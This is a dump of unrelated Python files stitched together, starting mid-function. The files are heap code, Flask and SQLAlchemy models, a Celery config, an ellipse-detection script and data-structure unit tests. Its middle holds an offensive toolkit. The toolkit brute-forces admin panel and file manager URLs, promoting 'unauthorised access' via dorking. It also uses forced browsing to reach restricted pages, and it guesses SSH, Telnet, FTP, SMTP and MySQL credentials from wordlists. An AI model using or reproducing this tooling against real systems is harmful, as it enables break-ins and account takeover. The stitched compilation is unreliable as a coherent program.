while i > 0 and A[parent(i)] < A[i]:
A[i], A[parent(i)] = A[parent(i)], A[i]
i = parent(i)
return A
def max_heap_insert(A, key, A_heapsize):
A.append(float('-inf'))
heap_increase_key(A, A_heapsize, key)
return A
def heap_delete(A, i, A_heapsize):
A.pop(i)
A_heapsize -= 1
max_heapify(A, i, A_heapsize) #时间为O(lgn),如果使用build_max_heap则时间为O(nlgn)
return A
A = [1,2,3,4,5,6,7,8,9]
A_heapsize = len(A)
A = build_max_heap(A, A_heapsize)
#print(A)
#print(heap_sort(A, A_heapsize))
#print(heap_extract_max(A, A_heapsize))
#print(heap_increase_key(A, 2, 10))
#print(max_heap_insert(A, 12345, A_heapsize))
print(heap_delete(A, 5, A_heapsize)) |
from sqlalchemy import Column, Integer, String
from . import Base
class Instrument(Base):
"""
Map class for table instrument.
- **instrument_id**: Integer, primary_key.
- **instrument_type**: String(50), not null.
Note:
https://rszalski.github.io/magicmethods/
"""
__tablename__ = "instrument"
instrument_id = Column(Integer, primary_key = True)
instrument_type = Column(String(50), nullable = False)
def __init__(self, instrument_type):
"""
Costructor method.
Args:
- instrument_type (str): Type of financial instrument.
"""
self.instrument_type = instrument_type
def __repr__(self):
return "<Instrument(instrument_type={})>".format(self.instrument_type)
def to_dict(self):
"""
As the name tell, it returns attributes in a dict form.
Note:
The __dict__ method is not overrideble.
"""
return {"instrument_id" : self.instrument_id,
"instrument_type" : self.instrument_type
}
def __eq__(self, other):
"""
Overrides the default implementation.
Reference:
https://stackoverflow.com/questions/390250/elegant-ways-to-support-equivalence-equality-in-python-classes
"""
if isinstance(self, other.__class__):
return self.to_dict() == other.to_dict()
return False
def __ne__(self, other):
"""
Overrides the default implementation.
"""
return not self.__eq__(other)
def __lt__(self, other):
"""
Overrides the default implementation.
"""
if isinstance(self, other.__class__):
return self.instrument_type < other.instrument_type
return NotImplemented
def __le__(self, other):
"""
Overrides the default implementation.
"""
if isinstance(self, other.__class__):
return self.instrument_type <= other.instrument_type
return NotImplemented
def __gt__(self, other):
"""
Overrides the default implementation.
"""
if isinstance(self, other.__class__):
return self.instrument_type > other.instrument_type
return NotImplemented
def __ge__(self, other):
"""
Overrides the default implementation.
"""
if isinstance(self, other.__class__):
return self.instrument_type >= other.instrument_type
return NotImplemented
def __hash__(self):
"""
Overrides the default implementation.
"""
return hash(tuple(sorted(self.to_dict().items())))
|
from . import db
from werkzeug.security import generate_password_hash,check_password_hash
from . import login_manager
from flask_login import login_required
from flask_login import UserMixin
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from flask import current_app
'''#保护路由只让认证用户访问
@app.route('/secret')
@login_required
def secret():
return 'Only authenticated users are allowed!'
'''
class Role(db.Model):
__tablename__ = 'roles' #表名
id = db.Column(db.Integer,primary_key=True)
name = db.Column(db.String(64),unique = True)
users = db.relationship('User',backref = 'role')
#db.relationship()用于在两个表之间建立一对多关系。例如书中 roles 表中一个 User 角色,可以对应 users 表中多个实际的普通用户
#。实现这种关系时,要在“多”这一侧加入一个外键,指向“一”这一侧联接的记录。
#backref 定义反向关系
def __repr__(self):
return '<Role %s>' % self.name #返回一个字符表示模型
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer,primary_key=True)
#email = db.Column(db.String(64),unique=True,index=True)
#name = db.Column(db.String(64),unique = True,index=True)#不允许出现重复的值,并为这列添加索引
email = db.Column(db.String(64),index=True)
name = db.Column(db.String(64),index=True)
password_hash=db.Column(db.String(128))
confirmed = db.Column(db.Boolean,default = False) #判断是否认证
role_id = db.Column(db.Integer,db.ForeignKey('roles.id')) #建立和role表的关系
@property #定义password类属性方法
def password(self):
raise AttributeError('password is not a readable attribute') #?
@password.setter #对password进行赋值
def password(self,password):
self.password_hash = generate_password_hash(password)#输出密码的散列值
def verify_password(self,password):
return check_password_hash(self.password_hash,password)#验证用户输入的密码和散列值
def __repr__(self):
return '<User %s>' % self.name
# 确认用户
#加密
def generate_confirmation_token(self,expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'],expiration)
return s.dumps({'confirm':self.id}) #使用confirm存储self.id,生成加密签名
#解密,认证
def confirm(self,token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token.encode('utf-8'))
except:
return False
if data.get('confirm') != self.id: #验证加密签名
return False
self.confirmed = True
db.session.add(self)
return True
#要使用Flask-Login扩展,你必须在数据库模型文件(models.py)中提供一个回调函数user_loader,
#这个回调函数用于从会话中存储的用户ID重新加载用户对象。它应该接受一个用户的id作为输入,返回相应的用户对象。
@login_manager.user_loader
def load_user(user_id):
try:
return User.query.get(int(user_id))
except:
return None |
"""server file for she owns"""
import os
from flask import Flask, render_template, redirect, request, jsonify
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
from flask_debugtoolbar import DebugToolbarExtension
from jinja2 import StrictUndefined
from model import Business, Category, connect_to_db
app = Flask(__name__)
# For usage of flask sessiosn and debug toolbar
app.secret_key = "IN_DEV"
# StrictUndefinded raises errors for undefined variables, otherwise jinja
# does not give us an error, but fails silently
app.jinja_env.undefined = StrictUndefined
# auto-reloads changes we made, so we don't have to reload manually everytime
# we make a little change
app.jinja_env.auto_reload = True
# Google Maps API Key
google_maps_key = os.environ.get("GMaps_Key")
# add Google Maps API Key to global scope (all templates have access now)
app.add_template_global(google_maps_key, "google_maps_key")
@app.route("/")
def index():
"""render index page with """
return render_template("index.html")
@app.route("/business-map")
def display_map():
"""displays map with businesses based on selected category"""
return render_template("map_results.html")
@app.route("/businesses/<int:business_id>")
def show_business_details(business_id):
"""Shows detailed information about a selected business"""
business = Business.get_business_by_id(business_id)
return render_template("business_details.html", business=business)
# ------------------------------- JSON ROUTES ------------------------------- #
@app.route("/getBusinessInfo.json")
def get_business_info():
"""return a json element with businesses associated to the given category"""
category = request.args.get("searchTerm", "")
try:
# get category object with search term
category_object = Category.get_category_by_name(category)
except NoResultFound:
return jsonify({"data": "Can't find matches"})
# getting businesses associated with elected category
try:
businesses = category_object.categories_business
# when we have multiple matches, we get a list -> categories_business throws
# AttributeError (list does not have that attribute
except AttributeError:
# todo: turn list of objects into one big object to pass to JS
return jsonify({"data": "Can't find matches"})
return jsonify(Business.serialize_business_object(businesses))
if __name__ == "__main__":
# Setting debug=True here, since it has to be True at the
# point that we invoke the DebugToolbarExtension
app.debug = True
# Use the DebugToolbar
DebugToolbarExtension(app)
connect_to_db(app)
app.run(host="0.0.0.0") |
from datetime import timedelta
import djcelery
djcelery.setup_loader()
BROKER_BACKEND = "redis"
BROKER_URL = 'redis://119.3.4.159:6379/1'
CELERY_RESULT_BACKEND = 'redis://119.3.4.159:6379/2'
# 设置任务队列,区分不同的任务类型
CELERY_QUEUES = {
"beat_tasks": {
"exchange": "beat_tasks",
"exchange_type": "direct",
"binding_key": "beat_tasks",
},
"work_queue": {
"exchange": "work_queue",
"exchange_type": "direct",
"binding_key": "work_queue",
},
}
# 指定默认使用的任务队列
CELERY_DEFAULT_QUEUE = "work_queue"
# 注册任务:对应celerytask应用下的tasks文件中的类
CELERY_IMPORTS = (
"celerytask.tasks",
)
# 有些情况下可以防止死锁
CELERYD_FORCE_EXECV = True
# 设置并发的worker数量
CELERYD_CONCURRENCY = 4
# 任务失败时允许重试
CELERY_ACKS_LATE = True
# 设置每个worker最多执行100个任务,之后会被销毁,可以防止内存泄漏
CELERYD_MAX_TASKS_PER_CHILD = 100
# 单个任务的最大运行时间,超时时会被终止
CELERYD_TASK_TIME_LIMIT = 12 * 30
# 定时任务
CELERYBEAT_SCHEDULE = {
'task1': {
'task': 'beat-task',
'schedule': timedelta(seconds=5),
# 'args': (2, 6),
'options': { # 设置使用的任务队列
'queue': 'beat_tasks',
}
}
}
|
import requests,pexpect,random,smtplib,telnetlib,sys,os
from ftplib import FTP
import paramiko
from paramiko import SSHClient, AutoAddPolicy
import mysql.connector as mconn
from payloads import *
def access(u,timeout=10,bypass=False,proxy=None):
'''
this function isused to check if the given link is returning 200 ok response or not.
the function takes those arguments:
u: the targeted link
timeout: (set by default to 10) timeout flag for the request
bypass: (set by default to False) option to bypass anti-crawlers by simply adding "#" to the end of the link :)
usage:
>>>import bane
>>>url='http://www.example.com/admin/'
>>>url+='edit.php'
>>>a=bane.access(url)
>>>if a==True:
... print 'accessable'
'''
if bypass==True:
u+='#'
if proxy:
proxy={'http':'http://'+proxy}
try:
r=requests.get(u, headers = {'User-Agent': random.choice(ua)} , allow_redirects=False,proxies=proxy,timeout=timeout)
if r.status_code == requests.codes.ok:
if (("Uncaught exception" not in r.text) or ("404 Not Found" not in r.text)):
return True
except Exception as e:
pass
return False
"""
in functions below you can use a proxy in any function that takes the 'proxy' parameter with this way:
example:
proxy='192.122.58.47:80'
"""
def filemanager(u,logs=True,mapping=False,returning=False,timeout=10,proxy=None):
'''
if you are lucky and smart enough, using google dorking you can gain an unauthorised access to private file managers and manipulate files
(delete, upload, edit...) and exploit this weakness on the security of the target for further purposes.
this funtion try to gain access to any giving website's filemanager by bruteforcing the links (list called "filemanager") and trying to get
200 ok response directly without redirectes which indicates in most of the cases to an unprotected accessebleb filemanager.
the function takes the following arguments:
u: the link: http://www.example.com
logs: (set by default to True) the show the process and requests
mapping: (set by default to: False) if it is set to True, it will stop the prcess when it finds the link, else: it continue for more
possible links
returning: (set by default to: False) if you want it to return a list of possibly accesseble links to be used in your scripts set it to: True
timeout: (set by default to 10) timeout flag for the requests
usage:
>>>import bane
>>>url='http://www.example.com/'
>>>bane.filemanager(url)
>>>bane.filemanager(url,returning=True,mapping=False)
'''
k=[]
if proxy:
proxy={'http':'http://'+proxy}
for i in manager:
try:
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
if logs==True:
print'[*]Trying:',g
r=requests.get(g, headers = {'User-Agent': random.choice(ua)} , allow_redirects=False,proxies=proxy,timeout=timeout)
if r.status_code == requests.codes.ok:
if (("Uncaught exception" not in r.text) or ("404 Not Found" not in r.text)):
if logs==True:
print'[+]FOUND!!!'
k.append(g)
if mapping==False:
break
else:
if logs==True:
print'[-]Failed'
else:
if logs==True:
print'[-]Failed'
except KeyboardInterrupt:
break
except Exception as e:
pass
if returning==True:
return k
def forcebrowsing(u,timeout=10,logs=True,returning=False,mapping=True,ext='php',proxy=None):
'''
this function is using "Forced Browsing" technique which is aim to access restricted areas without providing any credentials!!!
it is used here to gain access to admin control panel by trying different possible combinations of links with the given URL.
it's possible to do that and this a proof of concept that unserured cpanels with lack of right sessions configurations can be
accessed just by guessing the right links :)
the function takes those arguments:
u: the targeted link which should be leading to the control panel, example:
http://www.example.com/admin/login.php
you have to delete 'login.php' and insert the rest of the link in the function like this:
>>>import bane
>>>bane.forcebrowsing('http://www.example.com/admin/')
then the function will try to find possible accesseble links:
http://www.example.com/admin/edit.php
http://www.example.com/admin/news.php
http://www.example.com/admin/home.php
timeout: (set by default to 10) timeout flag for the request
logs: (set by default to: True) showing the process of the attack, you can turn it off by setting it to: False
returning: (set by default to: False) return a list of the accessible link(s), to make the function return the list, set to: True
mapping: (set by default to: True) find all possible links, to make stop if it has found 1 link just set it to: False
ext: (set by default to: "php") it helps you to find links with the given extention, cuurentky it supports only 3 extentions: "php", "asp"
and "aspx"( any other extention won't be used).
'''
if proxy:
proxy={'http':'http://'+proxy}
l=[]
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
for x in innerl:
g=u+x+'.'+ext
if logs==True:
print'[*]Trying:',g
try:
h=access(g,proxy=proxy)
except KeyboardInterrupt:
break
if h==1:
l.append(g)
if logs==True:
print'[+]FOUND!!!'
if mapping==False:
break
else:
if logs==True:
print'[-]Failed'
if returning==True:
return l
def adminlogin(u,p,timeout=10,proxy=None):
'''
this function try to use the values you insert in the dictionary field "p" to make a POST request in the login page and check it the
credentials are correct or not by checking the response code.
it takes 3 arguments:
u: login link
p: dictionary contains input names and values: {input's name : value} => example: {'user':'ala','pass':'ala'}
timeout: (set by default to: 10) timeout flag for the request
usage:
>>>import bane
>>>a=bane.adminlogin('http://www.example.com/admin/login.php',{'user':'ala','pass':'ala'})
>>>if a==True:
... print 'logged in!!!'
'''
if proxy:
proxy={'http':'http://'+proxy}
try:
r=requests.post(u,data=p,headers = {'User-Agent': random.choice(ua)},allow_redirects=False,proxies=proxy,timeout=timeout)
if r.status_code==302:
return True
except:
pass
return False
def adminpanel(u,logs=True,mapping=False,returning=False,ext='php',timeout=10,proxy=None):
'''
this function use a list of possible admin panel links with different extensions: php, asp, aspx, js, /, cfm, cgi, brf and html.
ext: (set by default to: 'php') to define the link's extention.
usage:
>>>import bane
>>>bane.adminpanel('http://www.example.com',ext='php',timeout=7)
>>>bane.adminpanel('http://www.example.com',ext='aspx',timeout=5)
'''
if proxy:
proxy={'http':'http://'+proxy}
links=[]
ext=ext.strip()
if ext.lower()=="php":
links=phpl
elif ext.lower()=="asp":
links=aspl
elif ext.lower()=="aspx":
links=aspxl
elif ext.lower()=="js":
links=jsl
elif ext=="/":
links=slashl
elif ext.lower()=="cfm":
links=cfml
elif ext.lower()=="cgi":
links=cgil
elif ext.lower()=="brf":
links=brfl
elif ext.lower()=="html":
links=htmll
k=[]
for i in links:
try:
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
if logs==True:
print'[*]Trying:',g
r=requests.get(g,headers = {'User-Agent': random.choice(ua)},allow_redirects=False,proxies=proxy,timeout=timeout)
if r.status_code == requests.codes.ok:
if logs==True:
print'[+]FOUND!!!'
k.append(g)
if mapping==False:
break
else:
if logs==True:
print'[-]failed'
except KeyboardInterrupt:
break
except Exception as e:
if logs==True:
print '[-]Failed'
if returning==True:
return k
'''
the next functions are used to check the login credentials you provide, it can be used for bruteforce attacks.
it returns True if the given logins, else it returns False.
example:
>>>host='125.33.32.11'
>>>wordlist=['admin:admin','admin123:admin','user:password']
>>>for x in wordlist:
user=x.split(':')[0]
pwd=x.split(':')[1]
print '[*]Trying:',user,pwd
if ssh1(host,username=user,password=pwd)==True:
print'[+]Found!!!'
else:
print'[-]Failed'
'''
def smtp(u, p=25,username='',password='',ehlo=True,helo=False,ttls=False):
try:
s= smtplib.SMTP(u, p)
if ehlo==True:
s.ehlo()
if ttls==True:
s.starttls()
if helo==True:
s.helo()
if ttls==True:
s.starttls()
s.login(username, password)
return True
except Exception as e:
pass
return False
def telnet1(u,p=23,username='',password='',timeout=5):
p='telnet {} {}'.format(u,p)
try:
child = pexpect.spawn(p)
while True:
child.expect(['.*o.*'],timeout=timeout)
c= child.after
if 'ogin' in c:
child.send(username+'\n')
elif "assword" in c:
child.send(password+'\n')
break
child.expect('.*@.*',timeout=timeout)
c= child.after
for x in prompts:
if x in c:
return True
except Exception as e:
pass
return False
def telnet2(u,p=23,username='',password='',prompt='$',timeout=5):
try:
t = telnetlib.Telnet(u,p,timeout=timeout)
t.read_until(":",timeout=timeout)
t.write(username + "\n")
t.read_until(":",timeout=timeout)
t.write(password + "\n")
c= t.read_until(prompt,timeout=timeout)
for x in prompts:
if x in c:
return True
except Exception as e:
pass
return False
def ssh1(u,p=22,username='',password='',timeout=5):
p='ssh -p {} {}@{}'.format(p,username,u)
try:
child = pexpect.spawn(p)
while True:
child.expect(['.*o.*'],timeout=timeout)
c= child.after
if "yes/no" in c:
child.send('yes\n')
elif 'ogin' in c:
child.send(username+'\n')
elif "assword" in c:
child.send(password+'\n')
break
child.expect('.*@.*',timeout=timeout)
c= child.after
for x in prompts:
if x in c:
return True
except Exception as e:
pass
return False
def ssh2(ip,username='',password='',p=22,timeout=5):
try:
s = SSHClient()
s.set_missing_host_key_policy(AutoAddPolicy())
s.connect(ip, p,username=username, password=password,timeout=timeout)
stdin, stdout, stderr = s.exec_command ("echo alawashere",timeout=timeout)
r=stdout.read()
if "alawashere" in r:
return True
except Exception as e:
pass
return False
def ftpanon(ip,timeout=5):
try:
ftp = FTP(ip,timeout=timeout)
ftp.login()
return True
except Exception as e:
pass
return False
def ftp(ip,username='',password='',timeout=5):
try:
i=False
ftp = FTP(ip,timeout=timeout)
ftp.login(username,password)
return True
except Exception as e:
pass
return False
def mysql(u,username='root',password=''):
try:
mconn.connect(host=u,user=username, password=password)
return True
except Exception as e:
pass
return False
def hydra(u,proto="ssh",p=22,wl=[],logs=True,returning=False,mapping=False,timeout=5,ehlo=False,helo=True,ttls=False):
'''
this function is similar to hydra tool to bruteforce attacks on different ports.
proto: (set by default to: ssh) set the chosen protocol (ftp, ssh, telnet, smtp and mysql) and don't forget to set the port.
'''
o=''
if (sys.platform == "win32") or( sys.platform == "win64"):
if proto=="ssh":
s=ssh2
elif proto=="telnet":
s=telnet2
else:
if proto=="ssh":
s=ssh1
elif proto=="telnet":
s=telnet1
if proto=="ftp":
s=ftp
if proto=="smtp":
s=smtp
if proto=="mysql":
s=mysql
for x in wl:
user=x.split(':')[0].strip()
pwd=x.split(':')[1].strip()
if logs==True:
print"[*]Trying: {}:{}".format(user,pwd)
if proto=="mysql":
r=s(u,user,pwd)
elif proto=="ftp":
r=s(u,username=user,password=pwd,timeout=timeout)
elif proto=="smtp":
r=s(u,p,username=user,password=pwd,ehlo=ehlo,helo=helo,ttls=ttls)
else:
r=s(u,p,username=user,password=pwd,timeout=timeout)
if r==True:
if logs==True:
print"[+]Found!!!"
if returning==True:
o="{}:{}:{}".format(u,user,pwd)
break
else:
if logs==True:
print"[-]Failed"
if returning==True:
return o
|
# Brian Hamrick
# 10/16/08
# Ellipse detection
import sys
import copy
import time
import curses
from math import *
from pgm import pgm
from ppm import ppm
starttime=time.time()
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
stdscr.keypad(1)
maxy, maxx = stdscr.getmaxyx()
bary, barx = maxy/2+1, (maxx-(52))/2
stry, strx = maxy/2, (maxx-(39))/2
etay, etax = maxy/2, strx + 16
stdscr.erase()
def update_bar(percent,stdscr):
global starttime
bar = ''
i = 1
while i*2 <= percent:
bar = bar + '='
i+=1
while i*2 <= 100:
bar = bar + ' '
i+=1
stdscr.addstr(stry, strx, 'Progress: ' + str(int(percent)) + '%')
if percent > 1:
stdscr.addstr(etay, etax, 'ETA: ' + str(int(float(100-percent)*(time.time() - starttime)/percent)) + ' seconds remaining ')
stdscr.addstr(bary, barx, '[' + bar + ']')
stdscr.move(0,0)
stdscr.refresh()
update_bar(0,stdscr)
high_threshold = 400
low_threshold = 200
if len(sys.argv) < 2:
print 'YOU FAIL: NO INPUT FILE'
sys.exit(0)
infile = sys.argv[1]
outfile = infile[:-4] + '_ellipses.pgm'
img = pgm()
img.read(infile)
edges = pgm()
edges.read(infile)
tmp_img = pgm()
tmp_img.read(infile)
tmpfile = infile[:-4] + '_space.pgm'
outimg = pgm()
outimg.read(infile)
for r in range(outimg.height):
for c in range(outimg.width):
outimg.set_pixel(r,c,255)
# Parameterize ellipses as <r,c> = <rc,cc> + <a*cos(theta+phi),b*sin(theta+phi)>
amin = 5
amax = max(img.width,img.height)
agran = 1
bmin = 5
bmax = max(img.width,img.height)
bgran = 1
thetamin = 0
thetamax = 2*pi
thetagran = pi/10
counts = {}
counts_threshold = 5
def grad(img, r, c):
if r <= 0 or c <= 0 or r >= img.height-1 or c >= img.width-1:
return (0,0)
gx = img.get_pixel(r-1,c+1) + 2*img.get_pixel(r,c+1) + img.get_pixel(r+1,c+1) - img.get_pixel(r-1,c-1) - 2*img.get_pixel(r,c-1) - img.get_pixel(r+1,c-1)
gy = img.get_pixel(r+1,c-1) + 2*img.get_pixel(r+1,c) + img.get_pixel(r+1,c+1) - img.get_pixel(r-1,c-1) - 2*img.get_pixel(r-1,c) - img.get_pixel(r-1,c+1)
return (gx,gy)
if len(sys.argv) >= 3:
high_threshold = int(sys.argv[2])
if len(sys.argv) >= 4:
low_threshold = int(sys.argv[3])
queue = []
r = 1
while r < img.height-1:
c = 1
while c < img.width-1:
gx = img.get_pixel(r-1,c+1) + 2*img.get_pixel(r,c+1) + img.get_pixel(r+1,c+1) - img.get_pixel(r-1,c-1) - 2*img.get_pixel(r,c-1) - img.get_pixel(r+1,c-1)
gy = img.get_pixel(r+1,c-1) + 2*img.get_pixel(r+1,c) + img.get_pixel(r+1,c+1) - img.get_pixel(r-1,c-1) - 2*img.get_pixel(r-1,c) - img.get_pixel(r-1,c+1)
if abs(gx) + abs(gy) > high_threshold:
edges.set_pixel(r,c,1)
queue.append((r,c))
else:
edges.set_pixel(r,c,0)
c+=1
r+=1
while len(queue) > 0:
r,c = queue.pop(0)
gx, gy = grad(img, r, c)
if gy == 0:
tang = 0
else:
tang = -float(gx)/gy
if gx == 0:
norm = 0
else:
norm = float(gy)/gx
# rounding sin(pi/8) = 0.382
if norm > 0.382:
norm = 1
elif norm < -0.382:
norm = -1
else:
norm = 0
# end rounding
r1,c1 = r+1,int(c+norm)
gx1, gy1 = grad(img,r1,c1)
if(abs(gx1)+abs(gy1) > abs(gx) + abs(gy)):
continue
r1,c1 = r-1,int(c-norm)
gx1, gy1 = grad(img,r1,c1)
if(abs(gx1)+abs(gy1) > abs(gx) + abs(gy)):
continue
# rounding sin(pi/8) = 0.382
if tang > 0.382:
tang = 1
elif tang < -0.382:
tang = -1
else:
tang = 0
# end rounding
r1,c1 = r+1,int(c+tang)
gx1, gy1 = grad(img,r1,c1)
if edges.get_pixel(r1,c1)==0 and abs(gx1) + abs(gy1) > low_threshold:
edges.set_pixel(r1,c1,1)
queue.append((r1,c1))
r1,c1 = r-1,int(c-tang)
gx1, gy1 = grad(img,r1,c1)
if edges.get_pixel(r1,c1)==0 and abs(gx1) + abs(gy1) > low_threshold:
edges.set_pixel(r1,c1,1)
queue.append((r1,c1))
count_threshold=15
possible_ellipses=[]
a = amin
while a <= amax:
update_bar(float(100*(a-amin))/(amax-amin),stdscr)
b = bmin
while b<=bmax:
update_bar(float(100*(a-amin))/(amax-amin)+100*float(agran)*(b-bmin)/(float(amax-amin)*(bmax-bmin)),stdscr)
counts={}
for r in range(edges.height):
for c in range(edges.width):
if edges.get_pixel(r,c) == 1:
theta = thetamin
while theta < thetamax:
rc=(int(r-a*sin(theta)))
cc=(int(c-b*cos(theta)))
tup=(rc,cc,a,b)
if tup in counts:
counts[tup]+=1
else:
counts[tup]=1
theta+=thetagran
for tup in counts:
if counts[tup]>count_threshold:
possible_ellipses.append(tup)
b+=bgran
a+=agran
print possible_ellipses
vis={}
is_possible_ellipse={}
for tup in possible_ellipses:
is_possible_ellipse[tup]=True
ellipses=[]
for tup in possible_ellipses:
if vis.get(tup,False):
continue
rtot, ctot, atot, btot = 0,0,0,0
n = 0
q = [tup]
while len(q) > 0:
t = q.pop(0)
if vis.get(t,False):
continue
vis[t]=True
r,c,a,b = t
rtot+=r
ctot+=c
atot+=a
btot+=b
n+=1
t1 = (r+1,c,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c+1,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a+1,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a,b+1)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r-1,c,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c-1,a,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a-1,b)
if is_possible_ellipse.get(t1,False):
q.append(t1)
t1 = (r,c,a,b-1)
if is_possible_ellipse.get(t1,False):
q.append(t1)
if n > 0:
ellipses.append((rtot/n,ctot/n,atot/n,btot/n))
print ellipses
for ellipse in ellipses:
r, c, a, b = ellipse
theta = 0
while theta < 2*pi:
outimg.set_pixel(int(r+a*sin(theta)),int(c+b*cos(theta)),0)
theta+=pi/1000
outimg.write(outfile)
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
|
import unittest
from Deque_Generator import get_deque
from Stack import Stack
from Queue import Queue
class DSQTester(unittest.TestCase):
def setUp(self):
self.__deque = get_deque()
self.__stack = Stack()
self.__queue = Queue()
# Deque Tests
# Empty List Test
def test_empty_deque(self):
self.assertEqual('[ ]', str(self.__deque))
# Length Tests
def test_length_no_entry_deque(self):
self.assertEqual(0, len(self.__deque))
def test_length_one_entry_deque(self):
self.__deque.push_back('Data')
self.assertEqual(1, len(self.__deque))
def test_length_three_entry_deque(self):
self.__deque.push_back('Data')
self.__deque.push_back('Structures')
self.__deque.push_back('Rocks')
self.assertEqual(3, len(self.__deque))
# Push Front Tests
def test_push_front_one_entry_deque(self):
self.__deque.push_front('Data')
self.assertEqual('[ Data ]', str(self.__deque))
def test_push_front_three_entry_deque(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
self.assertEqual('[ Data, Structures, Rocks ]', str(self.__deque))
# Pop Front Tests
def test_pop_front_no_entry_deque(self):
returned = self.__deque.pop_front()
self.assertEqual(None, returned)
def test_pop_front_no_entry_not_modified_deque(self):
self.__deque.pop_front()
self.assertEqual('[ ]', str(self.__deque))
def test_pop_front_one_entry_deque(self):
self.__deque.push_front('Data')
self.__deque.pop_front()
self.assertEqual('[ ]', str(self.__deque))
def test_pop_front_one_entry_deque_returned_value(self):
self.__deque.push_front('Data')
returned = self.__deque.pop_front()
self.assertEqual('Data', returned)
def test_pop_front_three_entry_deque(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
self.__deque.pop_front()
self.assertEqual('[ Structures, Rocks ]', str(self.__deque))
def test_pop_front_three_entry_deque_returned_value(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
returned = self.__deque.pop_front()
self.assertEqual('Data', returned)
def test_pop_two_front_three_entry_deque(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
self.__deque.pop_front()
self.__deque.pop_front()
self.assertEqual('[ Rocks ]', str(self.__deque))
def test_pop_two_front_three_entry_deque_first_returned_value(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
returned = self.__deque.pop_front()
self.__deque.pop_front()
self.assertEqual('Data', returned)
def test_pop_two_front_three_entry_deque_second_returned_value(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
self.__deque.pop_front()
returned = self.__deque.pop_front()
self.assertEqual('Structures', returned)
# Peek Front Tests
def test_peek_front_no_entry_deque(self):
returned = self.__deque.peek_front()
self.assertEqual(None, returned)
def test_peek_front_one_entry_deque(self):
self.__deque.push_front('Data')
returned = self.__deque.peek_front()
self.assertEqual('Data', returned)
def test_peek_front_three_entry_deque(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
returned = self.__deque.peek_front()
self.assertEqual('Data', returned)
def test_peek_front_not_modified_deque(self):
self.__deque.push_front('Data')
self.__deque.peek_front()
self.assertEqual('[ Data ]', str(self.__deque))
# Push Back Tests
def test_push_back_one_entry_deque(self):
self.__deque.push_back('Data')
self.assertEqual('[ Data ]', str(self.__deque))
def test_push_back_three_entry_deque(self):
self.__deque.push_back('Data')
self.__deque.push_back('Structures')
self.__deque.push_back('Rocks')
self.assertEqual('[ Data, Structures, Rocks ]', str(self.__deque))
# Pop Back Tests
def test_pop_back_no_entry_deque(self):
returned = self.__deque.pop_back()
self.assertEqual(None, returned)
def test_pop_back_no_entry_deque_not_modified(self):
self.__deque.pop_back()
self.assertEqual('[ ]', str(self.__deque))
def test_pop_back_one_entry_deque(self):
self.__deque.push_front('Data')
self.__deque.pop_back()
self.assertEqual('[ ]', str(self.__deque))
def test_pop_back_one_entry_deque_return_value(self):
self.__deque.push_front('Data')
returned = self.__deque.pop_back()
self.assertEqual('Data', returned)
def test_pop_back_three_entry_deque(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
self.__deque.pop_back()
self.assertEqual('[ Data, Structures ]', str(self.__deque))
def test_pop_back_three_entry_deque_return_value(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
returned = self.__deque.pop_back()
self.assertEqual('Rocks', returned)
def test_pop_two_back_three_entry_deque(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
self.__deque.pop_back()
self.__deque.pop_back()
self.assertEqual('[ Data ]', str(self.__deque))
def test_pop_two_back_three_entry_deque_first_returned_value(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
returned = self.__deque.pop_back()
self.__deque.pop_back()
self.assertEqual('Rocks', returned)
def test_pop_two_back_three_entry_deque_second_returned_value(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
self.__deque.pop_back()
returned = self.__deque.pop_back()
self.assertEqual('Structures', returned)
# Peek Back Tests
def test_peek_back_no_entry_deque(self):
returned = self.__deque.peek_back()
self.assertEqual(None, returned)
def test_peek_back_one_entry_deque(self):
self.__deque.push_front('Data')
returned = self.__deque.peek_back()
self.assertEqual('Data', returned)
def test_peek_back_three_entry_deque(self):
self.__deque.push_front('Rocks')
self.__deque.push_front('Structures')
self.__deque.push_front('Data')
returned = self.__deque.peek_back()
self.assertEqual('Rocks', returned)
def test_peek_back_not_modified_deque(self):
self.__deque.push_front('Data')
self.__deque.peek_back()
self.assertEqual('[ Data ]', str(self.__deque))
# Stack Tests
# Empty List Test
def test_empty_stack(self):
self.assertEqual('[ ]', str(self.__stack))
# Length Tests
def test_length_no_entry_stack(self):
self.assertEqual(0, len(self.__stack))
def test_length_one_entry_stack(self):
self.__stack.push('Data')
self.assertEqual(1, len(self.__stack))
def test_length_three_entry_stack(self):
self.__stack.push('Data')
self.__stack.push('Structures')
self.__stack.push('Rocks')
self.assertEqual(3, len(self.__stack))
# Push Tests
